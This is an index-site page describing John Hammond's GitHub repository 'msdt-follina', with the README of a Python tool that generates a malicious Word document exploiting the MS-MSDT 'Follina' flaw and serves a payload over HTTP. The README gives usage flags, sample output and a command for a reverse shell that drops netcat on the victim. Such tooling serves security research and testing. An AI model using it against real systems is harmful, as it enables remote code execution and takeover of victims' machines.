Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/JohnHammond/msdt-follina
Codebase to generate an msdt-follina payload
https://github.com/JohnHammond/msdt-follina
Last synced: 21 days ago
JSON representation
Codebase to generate an msdt-follina payload
- Host: GitHub
- URL: https://github.com/JohnHammond/msdt-follina
- Owner: JohnHammond
- Created: 2022-05-30T15:06:11.000Z (over 2 years ago)
- Default Branch: main
- Last Pushed: 2022-06-08T15:47:38.000Z (over 2 years ago)
- Last Synced: 2024-11-21T03:33:39.658Z (21 days ago)
- Language: Python
- Size: 38.1 KB
- Stars: 1,614
- Watchers: 40
- Forks: 381
- Open Issues: 17
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-hacking-lists - JohnHammond/msdt-follina - Codebase to generate an msdt-follina payload (Python)
README
# MS-MSDT "Follina" Attack Vector
> John Hammond | May 30, 2022
--------------
Create a "Follina" MS-MSDT attack with a malicious Microsoft Word document and stage a payload with an HTTP server.
![Screenshot](https://user-images.githubusercontent.com/6288722/171033876-dbe73e3e-0a3a-436a-91d8-7fa77a5c1ace.png)
# Usage
```
usage: follina.py [-h] [--command COMMAND] [--output OUTPUT] [--interface INTERFACE] [--port PORT]options:
-h, --help show this help message and exit
--command COMMAND, -c COMMAND
command to run on the target (default: calc)
--output OUTPUT, -o OUTPUT
output maldoc file (default: ./follina.doc)
--interface INTERFACE, -i INTERFACE
network interface or IP address to host the HTTP server (default: eth0)
--port PORT, -p PORT port to serve the HTTP server (default: 8000)
```# Examples
Pop `calc.exe`:
```
$ python3 follina.py
[+] copied staging doc /tmp/9mcvbrwo
[+] created maldoc ./follina.doc
[+] serving html payload on :8000
```Pop `notepad.exe`:
```
$ python3 follina.py -c "notepad"
```Get a reverse shell on port 9001. **Note, this downloads a netcat binary _onto the victim_ and places it in `C:\Windows\Tasks`. It does not clean up the binary. This will trigger antivirus detections unless AV is disabled.**
```
$ python3 follina.py -r 9001
```![Reverse Shell](https://user-images.githubusercontent.com/6288722/171037880-03a73d6a-4606-4c42-abcb-ee52a9e669c6.png)